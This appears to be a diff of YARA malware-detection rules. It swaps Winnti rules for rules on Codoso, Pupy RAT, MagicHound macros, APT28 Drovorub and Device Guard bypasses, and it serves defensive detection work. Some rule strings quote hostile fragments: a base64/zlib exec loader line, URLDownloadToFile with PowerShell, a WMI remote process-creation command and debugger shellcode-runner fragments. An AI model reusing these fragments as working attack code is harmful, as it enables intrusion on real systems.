 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebd8465f484e1142ac741263282ea1c6f98e6bd0637ebdcec6ecc6233193407e"
+		logic_hash = "7eab3d398b5172127383047de7106a9713ec5b149f8e8ca1506b3382b007f648"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+
+	strings:
+		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+		$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
+		$s2 = "Help and Support" fullword ascii
+		$s3 = "netsvcs" fullword ascii
+		$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii
+		$s10 = "winlogon" fullword ascii
+		$s11 = "System\\CurrentControlSet\\Services" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "7f01b23ccfd1017249c36bc1618d6892" or ( pe.version_info [ "LegalCopyright" ] contains "Mozilla Corporation" and pe.version_info [ "ProductName" ] contains "Kingsoft" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_1 : FILE
+rule SIGNATURE_BASE_Codoso_PGV_PVID_1 : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "322e9362-bfb6-55e3-9a93-d54246311d11"
-		date = "2019-12-06"
-		modified = "2025-06-03"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L160-L181"
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9487773a-01d9-558e-8866-b8a8650996ba"
+		date = "2016-01-30"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L339-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ffeb40b096e5112adbb9c07b27b954424d6ef11a0a9bd736b43df9aa1e9af3e"
+		logic_hash = "8cecf96c7732becf83eb900bc36fa44daee466da6b483ea4f8c25ae9aeffcb7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		super_rule = 1
+		hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
+		hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
+		hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
+		hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
+		hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
 
 	strings:
-		$e1 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii nocase
-		$e2 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii nocase
-		$e3 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii nocase
-		$e4 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
-		$e5 = "BFE_Notify_Event_{7D00FA3C-FBDC-4A8D-AEEB-3F55A4890D2A}" nocase
-		$fp1 = "also increase possible memory usage of THOR."
+		$x1 = "DRIVERS\\ipinip.sys" fullword wide
+		$s1 = "TsWorkSpaces.dll" fullword ascii
+		$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+		$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
+		$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
+		$s5 = "Microsoft Chart ActiveX Control" fullword wide
+		$s6 = "MSChartCtrl.ocx" fullword wide
+		$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
+		$s8 = "WUServiceMain" fullword ascii
+		$s9 = "Cookie: pgv_pvid=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $e* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 3 of them ) ) or 5 of them
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_2
+rule SIGNATURE_BASE_APT_Pupyrat_PY : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "77f2cb7d-90a6-5654-9d2e-6b525cd910a2"
-		date = "2019-12-06"
-		modified = "2025-08-11"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L183-L206"
+		description = "Detects Pupy RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cdd689e3-437e-514d-a058-fad80ce0639e"
+		date = "2017-02-17"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_magichound.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "216557999b7100f26556f9f7088b16ba125ac39b308cb77c997d620ce9591d24"
+		logic_hash = "b30bc3082be3229ea2ef5d7c51ab6f97df2f612c80c45892e1a13fde1fb56725"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71"
 
 	strings:
-		$a1 = "IPSecMiniPort" wide fullword
-		$a2 = "ndis6fw" wide fullword
-		$a3 = "TCPIP" wide fullword
-		$a4 = "NDIS.SYS" ascii fullword
-		$a5 = "ntoskrnl.exe" ascii fullword
-		$a6 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
-		$a7 = "\\Device\\Null" wide
-		$a8 = "\\Device" wide
-		$a9 = "\\Driver" wide
-		$b1 = { 66 81 7? ?? 70 17 }
-		$b2 = { 81 7? ?? 07 E0 15 00 }
-		$b3 = { 8B 46 18 3D 03 60 15 00 }
+		$x1 = "reflective_inject_dll" fullword ascii
+		$x2 = "ImportError: pupy builtin module not found !" fullword ascii
+		$x3 = "please start pupy from either it's exe stub or it's reflective DLLR;" fullword ascii
+		$x4 = "[INJECT] inject_dll." fullword ascii
+		$x5 = "import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))" fullword ascii
+		$op1 = { 8b 42 0c 8b 78 14 89 5c 24 18 89 7c 24 14 3b fd }
 
 	condition:
-		(6 of ( $a* ) ) and ( 2 of ( $b* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 20000KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_3
+rule SIGNATURE_BASE_APT_Magichound_Malmacro : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "2e001c91-0794-5940-ad8c-8e58a01e100c"
-		date = "2019-12-06"
-		modified = "2025-08-11"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L208-L224"
+		description = "Detects malicious macro / powershell in Office document"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad573f52-dbda-5852-ad73-9ef47dd6e7df"
+		date = "2017-02-17"
+		modified = "2023-12-05"
+		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_magichound.yar#L33-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "601f8a3cba57fea46c16c36f8276631fcd22feef4ea1388a1ea35b00929b9fbb"
+		logic_hash = "198c6e7ab957d5c1bb45449b0b2210532e97ed11700f8435201200746e0dfa48"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b"
+		hash2 = "e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6"
 
 	strings:
-		$b1 = { 0F B7 ?? 16 [0-1] (81 E? | 25) 00 20 [8-10] 8B ?? 50 41 B9 40 00 00 00 41 B8 00 10 00 00 }
-		$b2 = { 8B 40 28 [5-8] 48 03 C8 48 8B C1 [5-8] 48 89 41 28 }
-		$b3 = { 48 6B ?? 28 [5-8] 8B ?? ?? 10 [5-8] 48 6B ?? 28 [5-8] 8B ?? ?? 14 }
-		$b4 = { 83 B? 90 00 00 00 00 0F 84 [9-12] 83 B? 94 00 00 00 00 0F 84 }
-		$b5 = { (45 | 4D) (31 | 33) C0 BA 01 00 00 00 [10-16] FF 5? 28 [0-1] (84 | 85) C0 }
+		$s1 = "powershell.exe " fullword ascii
+		$s2 = "CommandButton1_Click" fullword ascii
+		$s3 = "URLDownloadToFile" fullword ascii
 
 	condition:
-		(4 of ( $b* ) )
+		( uint16( 0 ) == 0xcfd0 and filesize < 8000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_4
+rule SIGNATURE_BASE_APT_APT28_Generic_Poco_Openssl
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "1f7ac215-d049-5b97-9797-9589a70cbf2b"
-		date = "2019-12-06"
-		modified = "2025-08-11"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L226-L240"
+		description = "Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)"
+		author = "NSA / FBI"
+		id = "b6d2477b-c9a2-5858-87cf-aa006109bc8f"
+		date = "2020-08-13"
+		modified = "2023-12-05"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32909e915a6e602ad1e8698cf5c128c2e54670770b97f54b1414c5798c42cc00"
-		score = 75
+		logic_hash = "b6a78c358b3aee6b172ec29e72ce810c6fbf332f180d5879f0889f47688225e1"
+		score = 50
 		quality = 85
 		tags = ""
 
 	strings:
-		$b1 = { 4C 8D 41 24 33 D2 B9 03 00 1F 00 FF 9? F8 00 00 00 48 85 C0 74 }
-		$b2 = { 4C 8B 4? 08 BA 01 00 00 00 49 8B C? FF D0 85 C0 [2-6] C7 4? 1C 01 00 00 00 B8 01 00 00 00 }
-		$b3 = { 8B 4B E4 8B 53 EC 41 B8 00 40 00 00 4? 0B C? FF 9? B8 00 00 00 EB }
+		$mw1 = { 89 F1 48 89 FE 48 89 D7 48 F7 C6 FF FF FF FF 0F 84 6B 02 00 00 48 F7 C7
+                 FF FF FF FF 0F 84 5E 02 00 00 48 8D 2D }
+		$mw2 = { 41 54 49 89 D4 55 53 F6 47 19 04 48 8B 2E 75 08 31 DB F6 45 00 03 75 }
+		$mw3 = { 85C0BA15000000750989D05BC30F1F44 0000BE }
+		$mw4 = { 53 8A 47 08 3C 06 74 21 84 C0 74 1D 3C 07 74 20 B9 ?? ?? ?? ?? BA FD 03
+                 00 00 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E8 06 3C 01 77 2B 48 8B 1F 48 8B 73
+                 10 48 89 DF E8 ?? ?? ?? ?? 48 8D 43 08 48 C7 43 10 00 00 00 00 48 C7 43 28 00 00 00 00 48
+                 89 43 18 48 89 43 20 5B C3 }
 
 	condition:
-		(2 of ( $b* ) )
+		all of them
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_5
+rule SIGNATURE_BASE_APT_APT28_Drovorub_Library_And_Unique_Strings : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "2a8f28e6-5a01-5a2f-b89b-9c34163afcda"
-		date = "2019-12-06"
-		modified = "2025-08-11"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L242-L269"
+		description = "Rule to detect Drovorub-server, Drovorub-agent, and Drovorub-client"
+		author = "NSA / FBI"
+		id = "8e010356-09c7-5897-9cbe-051cd0800502"
+		date = "2020-08-13"
+		modified = "2023-12-05"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "977d11fbb7cf4678d4da179c43d5566520ee97ac528e269a9b985e5bc75641b7"
+		logic_hash = "adb0d4cb6d589213e6a125d3cc20fcea8164b697bdd24d897ce75e7c7f06120a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$a1 = "-k netsvcs" ascii
-		$a2 = "svchost.exe" ascii fullword
-		$a3 = "%SystemRoot%\\System32\\ntoskrnl.exe" ascii
-		$a4 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii
-		$a5 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii
-		$a6 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii
-		$a7 = "cmd.exe" wide
-		$a8 = ",XML" wide
-		$a9 = "\\rundll32.exe" wide
-		$a10 = "\\conhost.exe" wide
-		$a11 = "\\cmd.exe" wide
-		$a12 = "NtQueryInformationProcess" ascii
-		$a13 = "Detours!" ascii fullword
-		$a14 = "Loading modified build of detours library designed for MPC-HC player (http://sourceforge.net/projects/mpc-hc/)" ascii
-		$a15 = "CONOUT$" wide fullword
-		$a16 = { C6 0? E9 4? 8? 4? 05 [2] 89 4? 01 }
+		$s1 = "Poco" ascii wide
+		$s2 = "Json" ascii wide
+		$s3 = "OpenSSL" ascii wide
+		$a1 = "clientid" ascii wide
+		$a2 = "-----BEGIN" ascii wide
+		$a3 = "-----END" ascii wide
+		$a4 = "tunnel" ascii wide
 
 	condition:
-		(12 of ( $a* ) )
+		( filesize > 1MB and filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) ) and ( #s1 > 20 and #s2 > 15 and #s3 > 15 and all of ( $a* ) )
 }
-rule SIGNATURE_BASE_APT_CN_Group_Loader_Jan20_1
+rule SIGNATURE_BASE_APT_APT28_Drovorub_Unique_Network_Comms_Strings
 {
 	meta:
-		description = "Detects loaders used by Chinese groups"
-		author = "Vitali Kremez"
-		id = "c85ae499-4f76-56ff-877d-887e1a7fc077"
-		date = "2020-02-01"
-		modified = "2025-08-11"
-		reference = "https://twitter.com/VK_Intel/status/1223411369367785472?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L271-L283"
+		description = "Rule to detect Drovorub-server, Drovorub-agent, or Drovorub-client based"
+		author = "NSA / FBI"
+		id = "c6a930e8-c1c0-5d96-9051-7516df848b45"
+		date = "2020-08-13"
+		modified = "2023-12-05"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L44-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30a180ada2390ca8df4bf7883624a5a176249622b4c34ce96931fe62b09ea8e3"
-		score = 80
+		logic_hash = "8c82766b76c36fe64c6aa99577e1997d7181dbd36a4c27329845ae8a413f5327"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$xc1 = { 8B C3 C1 E3 10 C1 E8 10 03 D8 6B DB 77 83 C3 13 }
+		$s_01 = "action" wide ascii
+		$s_02 = "auth.commit" wide ascii
+		$s_03 = "auth.hello" wide ascii
+		$s_04 = "auth.login" wide ascii
+		$s_05 = "auth.pending" wide ascii
+		$s_06 = "client_id" wide ascii
+		$s_07 = "client_login" wide ascii
+		$s_08 = "client_pass" wide ascii
+		$s_09 = "clientid" wide ascii
+		$s_10 = "clientkey_base64" wide ascii
+		$s_11 = "file_list_request" wide ascii
+		$s_12 = "module_list_request" wide ascii
+		$s_13 = "monitor" wide ascii
+		$s_14 = "net_list_request" wide ascii
+		$s_15 = "server finished" wide ascii
+		$s_16 = "serverid" wide ascii
+		$s_17 = "tunnel" wide ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Winnti_Dropper_X64_Libtomcrypt_Fns : TAU CN APT
+rule SIGNATURE_BASE_SUSP_Deviceguard_WDS_Evasion : FILE
 {
 	meta:
-		description = "Designed to catch winnti 4.0 loader and hack tool x64"
-		author = "CarbonBlack Threat Research"
-		id = "080d837c-248f-5718-b4a2-290495cd3b38"
-		date = "2019-08-26"
-		modified = "2025-08-11"
-		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L285-L332"
+		description = "Detects WDS file used to circumvent Device Guard"
+		author = "Florian Roth (Nextron Systems)"
+		id = "469b60d4-43d3-5a85-aa51-e453d8c858c0"
+		date = "2015-01-01"
+		modified = "2023-01-06"
+		reference = "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_deviceguard_evasion.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39d23f2a12a3b78182e52847e2fdb2d09386765138c37eb7f75edfc680505531"
-		score = 75
-		quality = 83
-		tags = "TAU, CN, APT"
-		rule_version = 1
-		yara_version = "3.8.1"
-		Confidence = "Prod"
-		Priority = "High"
-		TLP = "White"
-		exemplar_hashes = "5ebf39d614c22e750bb8dbfa3bcb600756dd3b36929755db9b577d2b653cd2d1"
-		sample_md5 = "794E127D627B3AF9015396810A35AF1C"
+		logic_hash = "4be9d7c34f7bafeb53db4fc1262a3692493b2253b0de7dc97480b01b62a9f12c"
+		score = 70
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$0x140001820 = { 48 83 EC 28 83 3D ?? ?? ?? ?? 00 }
-		$0x140001831 = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x140001842 = { B8 0B 00 E0 0C 48 83 C4 28 C3 }
-		$0x14000184c = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x140001881 = { B8 0C 00 E0 0C 48 83 C4 28 C3 }
-		$0x14000188b = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x1400018e4 = { B8 0D 00 E0 0C 48 83 C4 28 C3 }
-		$0x1400018ee = { 48 8D 0D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B8 A0 01 00 00 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 01 00 00 00 }
-		$0x140001911 = { 33 C0 48 83 C4 28 C3 }
-		$0x140001670 = { 40 55 56 57 41 55 41 56 41 57 B8 38 12 00 00 E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 10 12 00 00 48 8B AC 24 90 12 00 00 4C 8B B4 24 A0 12 00 00 45 33 FF 44 39 3D ?? ?? ?? ?? 49 8B F1 41 0F B7 F8 4C 8B EA 44 8B D9 66 44 89 7C 24 40 }
-		$0x1400016c8 = { B8 01 00 E0 0C }
-		$0x1400016d2 = { 48 89 9C 24 30 12 00 00 4D 85 C9 }
-		$0x1400016ec = { 8B 9C 24 98 12 00 00 83 FB 01 }
-		$0x1400016fc = { 48 8D 54 24 40 }
-		$0x140001701 = { 4C 89 A4 24 28 12 00 00 E8 ?? ?? ?? ?? 44 0F B7 64 24 40 66 44 3B E7 }
-		$0x140001727 = { 48 8D 54 24 40 41 8B CB E8 ?? ?? ?? ?? 0F B7 94 24 A8 12 00 00 66 39 54 24 40 }
-		$0x140001750 = { 41 8B CB E8 ?? ?? ?? ?? 8B F8 83 F8 FF }
-		$0x14000175f = { B8 0F 00 E0 0C }
-		$0x140001764 = { 4C 8B A4 24 28 12 00 00 }
-		$0x14000176c = { 48 8B 9C 24 30 12 00 00 }
-		$0x140001774 = { 48 8B 8C 24 10 12 00 00 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 38 12 00 00 41 5F 41 5E 41 5D 5F 5E 5D C3 }
-		$0x140001795 = { 48 8D 4C 24 54 33 D2 41 B8 B4 11 00 00 44 89 7C 24 50 E8 ?? ?? ?? ?? 48 8D 44 24 50 48 89 44 24 30 45 0F B7 CC 4D 8B C5 49 8B D6 8B CF 44 89 7C 24 28 44 89 7C 24 20 E8 ?? ?? ?? ?? 85 C0 }
-		$0x1400017d5 = { 4C 8D 4C 24 50 44 8B C3 48 8B D5 48 8B CE E8 ?? ?? ?? ?? 48 8D 4C 24 50 8B D8 E8 ?? ?? ?? ?? 8B C3 }
-		$0x1400017fb = { B8 04 00 E0 0C }
-		$0x140001805 = { B8 03 00 E0 0C }
-		$0x14000180f = { B8 02 00 E0 0C }
+		$s1 = "r @$ip=@$t0" ascii
+		$s2 = ";eb @$t0+" ascii
+		$s3 = ".foreach /pS" ascii
 
 	condition:
-		all of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Winnti_Dropper_X86_Libtomcrypt_Fns : TAU CN APT
+rule SIGNATURE_BASE_Invoke_Osiris : FILE
 {
 	meta:
-		description = "Designed to catch winnti 4.0 loader and hack tool x86"
-		author = "CarbonBlack Threat Research"
-		id = "48e7a3b0-55c7-5db5-855f-1614bd00afb4"
-		date = "2019-08-26"
-		modified = "2025-08-11"
-		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L334-L375"
+		description = "Osiris Device Guard Bypass - file Invoke-OSiRis.ps1"
+		author = "Florian Roth"
+		id = "ee1a7e10-ffca-58d2-b01f-7444468ceb3c"
+		date = "2017-03-27"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_osiris.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "84bfe001758677ff3a0d60d98e29c33ad1525a0afb27b73df750b2131e298879"
-		score = 75
+		logic_hash = "9a93308d6595de647a96716df0799ec690d91b2fb87e0b4a2f47e6b8b52eed97"
+		score = 70
 		quality = 85
-		tags = "TAU, CN, APT"
-		rule_version = 1
-		yara_version = "3.8.1"
-		confidence = "Prod"
-		oriority = "High"
-		TLP = "White"
-		exemplar_hashes = "0fdcbd59d6ad41dda9ae8bab8fad9d49b1357282027e333f6894c9a92d0333b3"
-		sample_md5 = "da3b64ec6468a4ec56f977afb89661b1"
+		tags = "FILE"
+		hash1 = "19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e"
 
 	strings:
-		$0x401d20 = { 8B 0D ?? ?? ?? ?? 33 C0 85 C9 }
-		$0x401d30 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 83 F8 ?? }
-		$0x401d46 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 10 83 F8 ?? }
-		$0x401d76 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 1C 83 F8 ?? }
-		$0x401dc4 = { 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 33 C0 F3 A5 5F C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 5E C3 }
-		$0x401bd0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 56 57 85 C0 C7 45 FC ?? ?? ?? ?? }
-		$0x401bf4 = { 8B 45 14 85 C0 }
-		$0x401bff = { 8B 45 18 85 C0 }
-		$0x401c14 = { 8B 7D 08 8D 45 FC 50 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 08 66 }
-		$0x401c31 = { 8B 45 0C 85 C0 }
-		$0x401c3c = { 8D 4D FC 51 57 E8 ?? ?? ?? ?? 66 8B 55 FC 83 C4 08 66 3B 55 24 }
-		$0x401c57 = { 8B 5D 20 85 DB }
-		$0x401c62 = { 57 E8 ?? ?? ?? ?? 8B D0 83 C4 04 83 FA ?? }
-		$0x401c72 = { B9 ?? ?? ?? ?? 33 C0 8D BD 48 EE FF FF C7 85 44 EE FF FF ?? ?? ?? ?? F3 AB 8B 4D 0C 8D 85 44 EE FF FF 50 6A ?? 81 E6 FF FF 00 00 6A ?? 56 51 53 52 E8 ?? ?? ?? ?? 83 C4 1C 85 C0 }
-		$0x401caf = { 8B 45 1C 8B 4D 18 8D 95 44 EE FF FF 52 8B 55 14 50 51 52 E8 ?? ?? ?? ?? 8B F0 8D 85 44 EE FF FF 50 E8 ?? ?? ?? ?? 83 C4 14 8B C6 5F 5E 5B 8B E5 5D C3 }
-		$0x401ce1 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401ced = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401cf9 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401d05 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401d16 = { 5F 5E 5B 8B E5 5D C3 }
+		$x1 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target" ascii wide
